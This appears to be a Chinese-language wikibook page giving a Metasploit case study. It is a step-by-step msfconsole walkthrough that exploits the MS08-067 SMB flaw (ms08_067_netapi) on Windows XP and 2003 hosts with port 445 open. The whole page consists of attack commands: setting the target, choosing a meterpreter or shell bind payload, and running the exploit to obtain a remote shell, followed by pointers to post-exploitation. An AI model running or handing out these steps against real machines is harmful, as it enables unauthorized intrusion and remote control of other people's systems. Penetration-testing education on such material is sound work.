Metasploit/案例研究
外觀
假設
- 您正在使用 Metasploit 的最新版本和漏洞利用(svn/subversion)
- 目標機器是執行 Windows XP(SP1、SP2、SP3)或 Windows 2003(SP0)的 Windows 機器
- 目標機器的 445 埠已開啟(透過 nmap -p 445 <目標機器的 IP> 檢查)
步驟
- 1. 載入 Metasploit 的 msfconsole
- 2. msf > info exploit/windows/smb/ms08_067_netapi
- 3. msf> use exploit/windows/smb/ms08_067_netapi
- 4. msf exploit(ms08_067_netapi) > show options
- 5. msf exploit(ms08_067_netapi) > set RHOST <目標 IP>
- 6. msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
- !您可以使用 generic/shell_bind_tcp 作為有效負載以獲得命令提示符。
- 7. msf exploit(ms08_067_netapi) > set TARGET <選擇與 'show targets' 命令給出的 ID 相對應的目標>。
- 8. msf exploit(ms08_067_netapi) > exploit
如果一切順利,您將獲得一個 Meterpreter shell。從那裡開始,您可以執行後期利用操作(在後期利用活動中解釋 |https://wikibook.tw/wiki/Metasploit/post_exploitation)
使用 MS08_067_Netapi 的影片指南
http://guides.intern0t.net/msf1.php